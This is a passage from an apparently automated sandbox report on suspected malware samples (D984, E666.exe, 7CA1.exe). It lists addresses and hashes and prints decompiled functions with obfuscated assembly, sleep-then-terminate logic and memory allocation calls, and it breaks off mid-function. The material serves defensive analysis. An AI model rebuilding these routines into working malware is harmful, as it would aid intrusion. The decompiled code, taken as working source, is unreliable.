0x00402c1f
0x00402c2a
0x00402c2b
0x00402c2e
0x00402c33
0x00402c35
0x00402c45
0x00402c6b
0x00402c6e
0x00402c71
0x00402c80
0x00402c86
0x00402c73
0x00402c73
0x00402c79
0x00402c79
0x00402c8b
0x00402c91
0x00402c92
0x00402c93
0x00402c96
0x00402ca7
0x00402cc2
0x00402c47
0x00402c4a
0x00402c4f
0x00402c51
0x00402c53
0x00402c56
0x00402c5b
0x00402c5d
0x00402c62
0x00402c69
0x00000000
0x00000000
0x00402c69
0x00402c5d
0x00402c51
0x00402c45
0x00402cc8

Memory Dump Source

Source File: 0000000E.00000002.807014174.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_D984.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eb334b091ada3894d7bc2550cdcc7fd4771e28d89526815cda72f1da41a8dec
Instruction ID: ac3f9a48b8241fa4787baba6bb88e996d90e4b1d5655853c31ab7ffc92292063
Opcode Fuzzy Hash: 5eb334b091ada3894d7bc2550cdcc7fd4771e28d89526815cda72f1da41a8dec
Instruction Fuzzy Hash: 6251543200A101DFEB00AF64AEDA5AAFB64FF15378B3401A7DC416E1E2D37B5642DA56

Uniqueness

Uniqueness Score: -1.00%

Function 00402B38, Relevance: .1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 30%

			E00402B38(signed int* __edx, void* __edi, intOrPtr* __esi, void* __fp0) {
				void* _t25;
				intOrPtr _t26;
				void* _t29;
				void* _t32;
				void* _t35;
				void* _t37;
				void* _t65;
				signed int* _t67;
				signed int _t68;
				void* _t73;
				intOrPtr* _t74;
				void* _t75;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				void* _t84;
				signed long long _t99;

				_t74 = __esi;
				_t67 = __edx;
				_t71 = __edi + 1;
				_t84 = __edi + 1;
				asm("das");
				asm("a16 scasb");
				_t26 = E00401277(_t25, 0x9ab9, _t71, __esi, _t75, _t84);
				asm("salc");
				asm("fcom dword [esi+0x6b]");
				_t79 = _t78 |  *(_t74 + _t75 - 0x59614c49);
				asm("sahf");
				asm("cmpsb");
				asm("movsb");
				asm("movsb");
				asm("ficomp word [ebx+0x5a39df54]");
				asm("salc");
				_t80 = _t79 |  *(_t74 + _t75 - 0x590a4c55);
				asm("movsb");
				asm("movsb");
				asm("ficomp word [ebx+0x5a10df54]");
				asm("movsb");
				asm("cs cmpsd");
				_push(_t80);
				asm("fisub word [eax+0x5a]");
				asm("salc");
				_t99 = (__fp0 - _t67[0x1a]) *  *_t67;
				asm("movsb");
				asm("scasd");
				asm("cmpsb");
				asm("movsb");
				asm("movsb");
				asm("ficomp word [ebx+0x5a7fdf54]");
				do {
					_pop(_t68);
					asm("salc");
					_t99 = _t99 +  *_t74;
					asm("movsb");
					 *[cs:0xa4a62bb3] = _t26;
					asm("movsb");
					asm("ficomp word [ebx+0x5a56df54]");
					_t26 = 0x49;
					_t69 = _t68 ^  *0xd05b5b70;
				} while ((_t68 ^  *0xd05b5b70) > 0);
				asm("lahf");
				_pop(_t73);
				asm("fst qword [eax-0x4f074b50]");
				_push(_t74);
				asm("adc dh, [eax-0x2b4c1752]");
				_push(ss);
				gs =  *0x0000007A;
				_push(0x2c1c);
				_t29 =  *_t80;
				asm("adc ch, [edi-0x40]");
				_push(0xab);
				E00401277(_t29, 0x688e1679, _t73, _t74, 0x13eba4a4, 0x9b);
				_push( *0x13EBA4A0);
				E004019D4();
				_push(0x688e46de);
				_push( *((intOrPtr*)(0x13eba4a0)));
				_t32 = E004025E8(_t73, _t74, 0x9b); // executed
				_t91 = _t32;
				if(_t32 != 0) {
					if(E00401F34(_t73, _t91,  *((intOrPtr*)(0x13eba4a0))) != 0) {
						L17:
						_t96 = gs;
						if(gs != 0) {
							_t35 = 0x688e6ab7;
							_t65 = 0x2ef8;
						} else {
							_t35 = 0x688e471e;
							_t65 = 0x2399;
						}
						_push( *0x688E99AF);
						_push(_t65);
						_push(_t35);
						_push( *((intOrPtr*)(0x13eba4a0)));
						E0040193B(_t69, _t96);
						_t37 = 0x2c1c;
						_t32 = E00401277(_t37, 0x688e1679, _t73, _t74, 0x13eba4a4, _t96);
					} else {
						_t32 = E00402255(_t99,  *((intOrPtr*)(0x13eba4a0)));
						_t93 = _t32;
						if(_t32 != 0) {
							_push( *((intOrPtr*)(0x13eba4a0)));
							_t32 = L00402321(0x688e1679, _t73, _t74, _t93, _t99);
							_t94 = _t32;
							if(_t32 != 0) {
								_t32 = E00401FF1(_t94, _t99,  *((intOrPtr*)(0x13eba4a0)));
								if(_t32 != 0) {
									goto L17;
								}
							}
						}
					}
				}
				return _t32;
			}

0x00402b38
0x00402b38
0x00402b38
0x00402b38
0x00402b39
0x00402b3a
0x00402b49
0x00402b4e
0x00402b4f
0x00402b54
0x00402b59
0x00402b5a
0x00402b5b
0x00402b5c
0x00402b5d
0x00402b65
0x00402b6b
0x00402b72
0x00402b73
0x00402b74
0x00402b7c
0x00402b7d
0x00402b86
0x00402b87
0x00402b8c
0x00402b8d
0x00402b93
0x00402b94
0x00402b98
0x00402b99
0x00402b9a
0x00402b9b
0x00402ba0
0x00402ba0
0x00402ba3
0x00402ba4
0x00402baa
0x00402bab
0x00402bb1
0x00402bb2
0x00402bba
0x00402bbf
0x00402bc5
0x00402bc8
0x00402bc9
0x00402bcc
0x00402bd2
0x00402bdf
0x00402bec
0x00402bed
0x00402bee
0x00402bf3
0x00402c01
0x00402c05
0x00402c17
0x00402c1c
0x00402c1f
0x00402c2a
0x00402c2b
0x00402c2e
0x00402c33
0x00402c35
0x00402c45
0x00402c6b
0x00402c6e
0x00402c71
0x00402c80
0x00402c86
0x00402c73
0x00402c73
0x00402c79
0x00402c79
0x00402c8b
0x00402c91
0x00402c92
0x00402c93
0x00402c96
0x00402ca7
0x00402cc2
0x00402c47
0x00402c4a
0x00402c4f
0x00402c51
0x00402c53
0x00402c56
0x00402c5b
0x00402c5d
0x00402c62
0x00402c69
0x00000000
0x00000000
0x00402c69
0x00402c5d
0x00402c51
0x00402c45
0x00402cc8

Memory Dump Source

Source File: 0000000E.00000002.807014174.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_D984.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f51a1350f02f31ca673438723fbeaec66e0bac50b46ce53ae83f4c302164230
Instruction ID: 3e85d14ce6c36aa09c03589aa9c8c3521ff663fa5e1e86b555b0dc280717ecfe
Opcode Fuzzy Hash: 2f51a1350f02f31ca673438723fbeaec66e0bac50b46ce53ae83f4c302164230
Instruction Fuzzy Hash: 17412A31109101EFFB01AB51DF8A5AEB775FF19368B2000BBDC417A1D2D77E5A05DA16

Uniqueness

Uniqueness Score: -1.00%

Function 00402BFB, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00402BFB(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t12;
				void* _t15;
				void* _t18;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t28;
				intOrPtr* _t30;

				_t27 = __esi;
				_t26 = __edi;
				_t21 = __ebx;
				asm("adc al, 0x62");
				_push(0x2c1c);
				_t12 =  *_t30;
				asm("adc ch, [edi-0x40]");
				_push(0xab);
				E00401277(_t12, __ebx, __edi, __esi, _t28, __eflags);
				_push( *((intOrPtr*)(_t28 - 4)));
				E004019D4();
				_t2 = _t21 + 0x3065; // 0x688e46de
				_push( *((intOrPtr*)(_t28 - 4)));
				_t15 = E004025E8(_t26, _t27, __eflags); // executed
				_t35 = _t15;
				if(_t15 != 0) {
					if(E00401F34(_t26, _t35,  *((intOrPtr*)(_t28 - 4))) != 0) {
						L11:
						_t40 = gs;
						if(gs != 0) {
							_t9 = _t21 + 0x543e; // 0x688e6ab7
							_t18 = _t9;
							_t23 = 0x2ef8;
						} else {
							_t8 = _t21 + 0x30a5; // 0x688e471e
							_t18 = _t8;
							_t23 = 0x2399;
						}
						_push( *((intOrPtr*)(_t21 + 0x8336)));
						_push(_t23);
						_push(_t18);
						_push( *((intOrPtr*)(_t28 - 4)));
						E0040193B(_t25, _t40);
						_t20 = 0x2c1c;
						_t15 = E00401277(_t20, _t21, _t26, _t27, _t28, _t40);
					} else {
						_t15 = E00402255(__fp0,  *((intOrPtr*)(_t28 - 4)));
						_t37 = _t15;
						if(_t15 != 0) {
							_push( *((intOrPtr*)(_t28 - 4)));
							_t15 = L00402321(__ebx, _t26, _t27, _t37, __fp0);
							_t38 = _t15;
							if(_t15 != 0) {
								_t15 = E00401FF1(_t38, __fp0,  *((intOrPtr*)(_t28 - 4)));
								if(_t15 != 0) {
									goto L11;
								}
							}
						}
					}
				}
				return _t15;
			}

0x00402bfb
0x00402bfb
0x00402bfb
0x00402bfb
0x00402bee
0x00402bf3
0x00402c01
0x00402c05
0x00402c17
0x00402c1c
0x00402c1f
0x00402c24
0x00402c2b
0x00402c2e
0x00402c33
0x00402c35
0x00402c45
0x00402c6b
0x00402c6e
0x00402c71
0x00402c80
0x00402c80
0x00402c86
0x00402c73
0x00402c73
0x00402c73
0x00402c79
0x00402c79
0x00402c8b
0x00402c91
0x00402c92
0x00402c93
0x00402c96
0x00402ca7
0x00402cc2
0x00402c47
0x00402c4a
0x00402c4f
0x00402c51
0x00402c53
0x00402c56
0x00402c5b
0x00402c5d
0x00402c62
0x00402c69
0x00000000
0x00000000
0x00402c69
0x00402c5d
0x00402c51
0x00402c45
0x00402cc8

Memory Dump Source

Source File: 0000000E.00000002.807014174.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_D984.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a8bd4eca60c59e258f16d0e70a1738de93e05cd34cc8aa36a9a378a6468ebc1
Instruction ID: 52cd7e5ac6ed9cc019fbfcf69bdf72a742899d53516448c63c37d0d49b3bd750
Opcode Fuzzy Hash: 4a8bd4eca60c59e258f16d0e70a1738de93e05cd34cc8aa36a9a378a6468ebc1
Instruction Fuzzy Hash: 7111213050C105EAFF01A6518F5E97E72699F01348F24007BAD42B52E2D7BD9F16B62F

Uniqueness

Uniqueness Score: -1.00%

Function 00402C01, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00402C01(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t12;
				void* _t15;
				void* _t18;
				void* _t20;
				void* _t21;
				void* _t23;
				signed int _t25;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t21 = __ebx;
				asm("adc ch, [edi-0x40]");
				_push(0xab);
				E00401277(_t12, __ebx, __edi, __esi, _t28, __eflags);
				_push( *((intOrPtr*)(_t28 - 4)));
				E004019D4();
				_t2 = _t21 + 0x3065; // 0x688e46de
				_push( *((intOrPtr*)(_t28 - 4)));
				_t15 = E004025E8(_t26, _t27, __eflags); // executed
				_t34 = _t15;
				if(_t15 != 0) {
					if(E00401F34(_t26, _t34,  *((intOrPtr*)(_t28 - 4))) != 0) {
						L8:
						_t39 = gs;
						if(gs != 0) {
							_t9 = _t21 + 0x543e; // 0x688e6ab7
							_t18 = _t9;
							_t23 = 0x2ef8;
						} else {
							_t8 = _t21 + 0x30a5; // 0x688e471e
							_t18 = _t8;
							_t23 = 0x2399;
						}
						E0040193B(_t25, _t39,  *((intOrPtr*)(_t28 - 4)), _t18, _t23,  *((intOrPtr*)(_t21 + 0x8336)));
						_t20 = 0x2c1c;
						_t15 = E00401277(_t20, _t21, _t26, _t27, _t28, _t39);
					} else {
						_t15 = E00402255(__fp0,  *((intOrPtr*)(_t28 - 4)));
						_t36 = _t15;
						if(_t15 != 0) {
							_push( *((intOrPtr*)(_t28 - 4)));
							_t15 = L00402321(__ebx, _t26, _t27, _t36, __fp0);
							_t37 = _t15;
							if(_t15 != 0) {
								_t15 = E00401FF1(_t37, __fp0,  *((intOrPtr*)(_t28 - 4)));
								if(_t15 != 0) {
									goto L8;
								}
							}
						}
					}
				}
				return _t15;
			}

0x00402c01
0x00402c01
0x00402c01
0x00402c01
0x00402c05
0x00402c17
0x00402c1c
0x00402c1f
0x00402c24
0x00402c2b
0x00402c2e
0x00402c33
0x00402c35
0x00402c45
0x00402c6b
0x00402c6e
0x00402c71
0x00402c80
0x00402c80
0x00402c86
0x00402c73
0x00402c73
0x00402c73
0x00402c79
0x00402c79
0x00402c96
0x00402ca7
0x00402cc2
0x00402c47
0x00402c4a
0x00402c4f
0x00402c51
0x00402c53
0x00402c56
0x00402c5b
0x00402c5d
0x00402c62
0x00402c69
0x00000000
0x00000000
0x00402c69
0x00402c5d
0x00402c51
0x00402c45
0x00402cc8

Memory Dump Source

Source File: 0000000E.00000002.807014174.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_D984.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aba60e48e92cb2b09b873d5c8ea28a2240f160238eccea7537a2bd1afc53be07
Instruction ID: 94dd4e34baa45bb6a7d52d13517e1efb42c98130ce2376b8e4646defd1028816
Opcode Fuzzy Hash: aba60e48e92cb2b09b873d5c8ea28a2240f160238eccea7537a2bd1afc53be07
Instruction Fuzzy Hash: D2011220118105F9FF0167528F1A97E75299F01348F24007BAC41B52E2DBBD8F15A62F

Uniqueness

Uniqueness Score: -1.00%

Function 00402C12, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00402C12(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t12;
				void* _t15;
				void* _t18;
				void* _t20;
				void* _t21;
				void* _t23;
				signed int _t25;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t21 = __ebx;
				asm("a16 push es");
				_push(0xab);
				E00401277(_t12, __ebx, __edi, __esi, _t28, __eflags);
				_push( *((intOrPtr*)(_t28 - 4)));
				E004019D4();
				_t2 = _t21 + 0x3065; // 0x688e46de
				_push( *((intOrPtr*)(_t28 - 4)));
				_t15 = E004025E8(_t26, _t27, __eflags); // executed
				_t34 = _t15;
				if(_t15 != 0) {
					if(E00401F34(_t26, _t34,  *((intOrPtr*)(_t28 - 4))) != 0) {
						L8:
						_t39 = gs;
						if(gs != 0) {
							_t9 = _t21 + 0x543e; // 0x688e6ab7
							_t18 = _t9;
							_t23 = 0x2ef8;
						} else {
							_t8 = _t21 + 0x30a5; // 0x688e471e
							_t18 = _t8;
							_t23 = 0x2399;
						}
						E0040193B(_t25, _t39,  *((intOrPtr*)(_t28 - 4)), _t18, _t23,  *((intOrPtr*)(_t21 + 0x8336)));
						_t20 = 0x2c1c;
						_t15 = E00401277(_t20, _t21, _t26, _t27, _t28, _t39);
					} else {
						_t15 = E00402255(__fp0,  *((intOrPtr*)(_t28 - 4)));
						_t36 = _t15;
						if(_t15 != 0) {
							_push( *((intOrPtr*)(_t28 - 4)));
							_t15 = L00402321(__ebx, _t26, _t27, _t36, __fp0);
							_t37 = _t15;
							if(_t15 != 0) {
								_t15 = E00401FF1(_t37, __fp0,  *((intOrPtr*)(_t28 - 4)));
								if(_t15 != 0) {
									goto L8;
								}
							}
						}
					}
				}
				return _t15;
			}

0x00402c12
0x00402c12
0x00402c12
0x00402c12
0x00402c05
0x00402c17
0x00402c1c
0x00402c1f
0x00402c24
0x00402c2b
0x00402c2e
0x00402c33
0x00402c35
0x00402c45
0x00402c6b
0x00402c6e
0x00402c71
0x00402c80
0x00402c80
0x00402c86
0x00402c73
0x00402c73
0x00402c73
0x00402c79
0x00402c79
0x00402c96
0x00402ca7
0x00402cc2
0x00402c47
0x00402c4a
0x00402c4f
0x00402c51
0x00402c53
0x00402c56
0x00402c5b
0x00402c5d
0x00402c62
0x00402c69
0x00000000
0x00000000
0x00402c69
0x00402c5d
0x00402c51
0x00402c45
0x00402cc8

Memory Dump Source

Source File: 0000000E.00000002.807014174.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_D984.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 591edc4c612f48173f805103314d01a2d3c18d9f074296c9ecf59b10e61bd19b
Instruction ID: 69eb8ccb3173368d7466cfbebad6b250e745b2528687b1428edbefbc5d99c229
Opcode Fuzzy Hash: 591edc4c612f48173f805103314d01a2d3c18d9f074296c9ecf59b10e61bd19b
Instruction Fuzzy Hash: 5001DE20518105FAFF01A6528F5A97E75699F01348F24007BAD42B52E2DBBD8F16AA2F

Uniqueness

Uniqueness Score: -1.00%

Function 00402C16, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00402C16(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t12;
				void* _t15;
				void* _t18;
				void* _t20;
				void* _t21;
				void* _t23;
				signed int _t25;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t21 = __ebx;
				E00401277(_t12, __ebx, __edi, __esi, _t28, __eflags);
				_push( *((intOrPtr*)(_t28 - 4)));
				E004019D4();
				_t2 = _t21 + 0x3065; // 0x688e46de
				_push( *((intOrPtr*)(_t28 - 4)));
				_t15 = E004025E8(_t26, _t27, __eflags); // executed
				_t33 = _t15;
				if(_t15 != 0) {
					if(E00401F34(_t26, _t33,  *((intOrPtr*)(_t28 - 4))) != 0) {
						L6:
						_t38 = gs;
						if(gs != 0) {
							_t9 = _t21 + 0x543e; // 0x688e6ab7
							_t18 = _t9;
							_t23 = 0x2ef8;
						} else {
							_t8 = _t21 + 0x30a5; // 0x688e471e
							_t18 = _t8;
							_t23 = 0x2399;
						}
						E0040193B(_t25, _t38,  *((intOrPtr*)(_t28 - 4)), _t18, _t23,  *((intOrPtr*)(_t21 + 0x8336)));
						_t20 = 0x2c1c;
						_t15 = E00401277(_t20, _t21, _t26, _t27, _t28, _t38);
					} else {
						_t15 = E00402255(__fp0,  *((intOrPtr*)(_t28 - 4)));
						_t35 = _t15;
						if(_t15 != 0) {
							_push( *((intOrPtr*)(_t28 - 4)));
							_t15 = L00402321(__ebx, _t26, _t27, _t35, __fp0);
							_t36 = _t15;
							if(_t15 != 0) {
								_t15 = E00401FF1(_t36, __fp0,  *((intOrPtr*)(_t28 - 4)));
								if(_t15 != 0) {
									goto L6;
								}
							}
						}
					}
				}
				return _t15;
			}

0x00402c16
0x00402c16
0x00402c16
0x00402c17
0x00402c1c
0x00402c1f
0x00402c24
0x00402c2b
0x00402c2e
0x00402c33
0x00402c35
0x00402c45
0x00402c6b
0x00402c6e
0x00402c71
0x00402c80
0x00402c80
0x00402c86
0x00402c73
0x00402c73
0x00402c73
0x00402c79
0x00402c79
0x00402c96
0x00402ca7
0x00402cc2
0x00402c47
0x00402c4a
0x00402c4f
0x00402c51
0x00402c53
0x00402c56
0x00402c5b
0x00402c5d
0x00402c62
0x00402c69
0x00000000
0x00000000
0x00402c69
0x00402c5d
0x00402c51
0x00402c45
0x00402cc8

Memory Dump Source

Source File: 0000000E.00000002.807014174.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_D984.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8375172ab2dc3a157800504cc046cabc4f04a32f5874d07e2e57d920b258b3e
Instruction ID: 22f91f3ad527b43ded7c43fe05e3e31a54a2160e6f7bd47ea20a36d237ffec38
Opcode Fuzzy Hash: b8375172ab2dc3a157800504cc046cabc4f04a32f5874d07e2e57d920b258b3e
Instruction Fuzzy Hash: 4401CC20518105F9FF01B7628F1A9BE75699F00348F24007BBC41B52E6DBBD8F15AA2E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040DF48, Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__cftof_l.LIBCMT ref: 0040DF6E

Part of subcall function 0040DD93: __fltout2.LIBCMT ref: 0040DDBF

__cftog_l.LIBCMT ref: 0040DF94
__cftoe_l.LIBCMT ref: 0040DFC6

Memory Dump Source

Source File: 0000000E.00000002.807044900.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_409000_D984.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 371dcc409b8a9c37bc45af426a8add198d970d59fd773847fc00fd30e5f9ded3
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 7B11803280014EBBCF125EC4CC41CEE3F22BF19354B198426FA1968171C23AC9B5AB85

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: E666.exe PID: 4780 Parent PID: 3424 E666.exeCOMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 005207A6, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Module32First.KERNEL32(00000000,00000224), ref: 005207EE

Memory Dump Source

Source File: 00000011.00000002.772321394.0000000000520000.00000040.00000001.sdmp, Offset: 00520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_520000_E666.jbxd

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: ba861284fa5893b07faba6330d824de5ecbc5985226b591547a2835c267d44da
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 64F062321027216BD7203AB5A88DA6F7AE8FF4A765F141528E642910C2DA70F8454A61

Uniqueness

Uniqueness Score: -1.00%

Function 00520465, Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005204B6

Memory Dump Source

Source File: 00000011.00000002.772321394.0000000000520000.00000040.00000001.sdmp, Offset: 00520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_520000_E666.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 39dbc72f5874e974593d6cb4f1b6f536f3c4592b293bf575af544f17c25ff964
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 87112D79A40208EFDB01DF98C985E98BFF5AF09350F058094F9489B3A2D371EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: E666.exe PID: 4388 Parent PID: 4780 E666.exeCOMMON

Executed Functions

Function 0040196D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E0040196D(void* __eax, void* __ebx, void* __ecx, void* __edi, short __esi, void* __fp0) {
				intOrPtr _t14;
				void* _t17;
				intOrPtr* _t23;
				void* _t26;
				void* _t27;
				void* _t28;
				signed int _t33;
				intOrPtr* _t35;
				void* _t38;

				_t31 = __esi;
				_t29 = __edi;
				asm("in eax, 0xe5");
				 *((short*)(__eax + _t33 * 2)) = __esi;
				 *((intOrPtr*)(__eax + _t33 * 2)) = __esi;
				_push(0x1999);
				_t14 =  *_t35;
				__eflags = __al;
				_t26 = 0x5c;
				E004012AB(_t14, __ebx, _t26, _t28, __edi, __esi, _t38);
				_t23 =  *((intOrPtr*)(_t33 + 8));
				Sleep(0x1388);
				_t17 = E004014EA(_t28, _t38, __fp0, _t23,  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)), _t33 - 4); // executed
				_t39 = _t17;
				if(_t17 != 0) {
					_push( *((intOrPtr*)(_t33 + 0x14)));
					_push( *((intOrPtr*)(_t33 - 4)));
					_push(_t17);
					_push(_t23); // executed
					E004015BD(_t23, _t28, _t29, _t31, _t39); // executed
				}
				 *_t23(0xffffffff, 0); // executed
				_t27 = 0x5c;
				return E004012AB(0x1999, _t23, _t27, _t28, _t29, _t31, _t39);
			}

APIs

Sleep.KERNELBASE(00001388), ref: 004019A1
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Strings

j\Y, xrefs: 00401989

Memory Dump Source

Source File: 00000013.00000002.783757925.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_E666.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID: j\Y
API String ID: 417527130-662177190
Opcode ID: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
Instruction ID: 595b9c3ea7707adfb89ee20c44a57f79679102a22a402f6ef59d3c67027402ce
Opcode Fuzzy Hash: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
Instruction Fuzzy Hash: B10184B2604245EBDB005FE5DC92DAA3B74AF01314F2401ABF512B91F2DA3C8513E71A

Uniqueness

Uniqueness Score: -1.00%

Function 00401962, Relevance: 3.1, APIs: 2, Instructions: 52
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00401962(void* __ecx, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t9;
				void* _t12;
				void* _t17;
				intOrPtr* _t18;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;

				_push(0x1999);
				_t9 =  *_t25;
				__eflags = __al;
				_t20 = 0x5c;
				E004012AB(_t9, _t17, _t20, _t22, _t23, _t24, _t27);
				_t18 = _a4;
				Sleep(0x1388);
				_t12 = E004014EA(_t22, _t27, __fp0, _t18, _a8, _a12,  &_v8); // executed
				_t28 = _t12;
				if(_t12 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t12);
					_push(_t18); // executed
					E004015BD(_t18, _t22, _t23, _t24, _t28); // executed
				}
				 *_t18(0xffffffff, 0); // executed
				_t21 = 0x5c;
				return E004012AB(0x1999, _t18, _t21, _t22, _t23, _t24, _t28);
			}

APIs

Sleep.KERNELBASE(00001388), ref: 004019A1
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Memory Dump Source

Source File: 00000013.00000002.783757925.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_E666.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
Instruction ID: c7dbb5b86db80192b1cd6b67b95130a9e8bba6362884e51d04f8a5ef40e6dacf
Opcode Fuzzy Hash: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
Instruction Fuzzy Hash: A50144F1208205FBEB005AD59DA2E7B3668AB01715F20013BBA03790F1D57D9913E72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401A0B, Relevance: 1.6, APIs: 1, Instructions: 96
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Memory Dump Source

Source File: 00000013.00000002.783757925.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_E666.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: a8691778e22ba560dfeb55f88f619201248d4b2ee09304a2e52f86155ed302cb
Instruction ID: 6d9108f025a0daaf84588f91761baf46a4613dd7645499535b00fdf5ce75212c
Opcode Fuzzy Hash: a8691778e22ba560dfeb55f88f619201248d4b2ee09304a2e52f86155ed302cb
Instruction Fuzzy Hash: 3E21D074609204EAC7156665C863FB637909B41329F60153FE9A3BE2F2C67C4487EB27

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: 7CA1.exe PID: 5352 Parent PID: 3424 7CA1.exeCOMMON

Executed Functions

Function 0040C2E0, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 109
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040C2E0() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;
				CHAR* _t5;
				intOrPtr _t6;
				struct HINSTANCE__* _t8;
				CHAR* _t11;
				struct HINSTANCE__* _t13;
				CHAR* _t16;
